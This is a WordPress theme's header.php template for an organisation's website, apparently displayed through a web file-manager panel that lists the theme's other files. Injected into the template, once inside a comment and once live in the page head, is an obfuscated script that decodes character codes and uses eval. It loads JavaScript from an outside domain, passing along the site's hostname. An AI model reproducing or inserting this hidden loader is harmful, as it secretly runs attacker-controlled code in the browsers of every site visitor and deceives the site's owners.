PATH:
home
/
lab2454c
/
biocei.com
/
wp-content
/
themes
/
biocei
<?php /** * The header for our theme * * This is the template that displays all of the <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WP_Bootstrap_Starter */ $header_other_content = get_field('header_other_content','option'); ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php // WordPress 5.2 wp_body_open implementation if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } else { do_action( 'wp_body_open' ); } ?> <?php $header_other_content = get_field('header_other_content','option'); ?> <nav class="navbar navbar-expand-lg navbar__top" id="mainNav"> <div class="container"> <a class="navbar-brand navbar___brand" href="<?php echo esc_url( home_url( '/' )); ?>"><img src="<?php echo get_template_directory_uri();?>/inc/assets/images/logo.png"></a> <button class="navbar-toggler navbar__toggler hamburger__menu" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation"><span class="menu"></span></button> <div class="collapse navbar-collapse" id="navbarResponsive"> <?php wp_nav_menu(array( 'theme_location' => 'primary', 'container' => 'div', 'container_id' => 'navbarResponsive', 'container_class' => 'collapse navbar-collapse', 'menu_id' => false, 'menu_class' => 'navbar-nav navbar__nav', 'depth' => 3, 'fallback_cb' => 'wp_bootstrap_navwalker::fallback', 'walker' => new wp_bootstrap_navwalker() )); ?> </div> <div class="user__info"> <a href="#search"> <i class="ico__box"> <img src="<?php echo $header_other_content['search_image'];?>" alt="" /> </i> </a> <a href="<?php echo !empty($header_other_content['contact_us_url']) ? $header_other_content['contact_us_url'] :'#';?> " class="contact__btn"> <span><?php echo $header_other_content['contact_us_title'];?></span> </a> </div> </div> <div id="search" class="serach__wrapp"> <button type="button" class="close close__btn"> <img src="<?php echo $header_other_content['search_close_image'];?>" alt="" /> </button> <?php echo get_search_form();?> <!-- <form> <input type="search" value="" placeholder="Search..." class="form-control form__control" /> <button type="submit" class="btn btn-primary search__btn">Search</button> </form> --> </div> </nav>
[+]
woocommerce
[-] template-climate-delivery-initiative.php
[edit]
[-] footer-widget.php
[edit]
[-] search.php
[edit]
[-] template-learning-laboratory.php
[edit]
[-] template-funding.php
[edit]
[-] index.php
[edit]
[-] woocommerce.php
[edit]
[-] page.php
[edit]
[-] searchform.php
[edit]
[+]
..
[-] sidebar.php
[edit]
[-] rtl.css
[edit]
[-] blank-page-with-container.php
[edit]
[-] single.php
[edit]
[-] template-programs.php
[edit]
[-] footer.php
[edit]
[-] template-events.php
[edit]
[-] template-about.php
[edit]
[-] template-home.php
[edit]
[-] blank-page.php
[edit]
[-] left-sidebar.php
[edit]
[-] header.php
[edit]
[-] style.css
[edit]
[-] 404.php
[edit]
[-] readme.txt
[edit]
[-] template-team.php
[edit]
[-] template-our-work.php
[edit]
[-] template-governance.php
[edit]
[-] single-attachment.php
[edit]
[-] template-overview.php
[edit]
[-] screenshot.png
[edit]
[-] custom-editor-style.css
[edit]
[-] template-news-events.php
[edit]
[-] template-Integrated-results-frameworks.php
[edit]
[-] functions.php
[edit]
[-] template-work-asia.php
[edit]
[-] template-programs-details.php
[edit]
[-] archive.php
[edit]
[-] fullwidth.php
[edit]
[-] error_log
[edit]
[+]
template-parts
[-] template-events-listing.php
[edit]
[-] comments.php
[edit]
[-] template-contact.php
[edit]
[+]
inc